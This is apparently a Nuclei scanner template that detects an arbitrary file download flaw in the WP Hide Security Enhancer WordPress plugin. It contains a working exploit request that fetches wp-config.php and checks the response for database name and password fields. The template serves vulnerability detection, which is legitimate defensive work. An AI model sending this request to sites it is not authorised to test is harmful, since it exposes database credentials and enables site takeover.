id: hide-security-enhancer-lfi

info:
  name: WP Hide Security Enhancer 1.3.9.2 - Arbitrary File Download Vulnerability
  author: dhiyaneshDK
  severity: high
  description: WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation
  reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200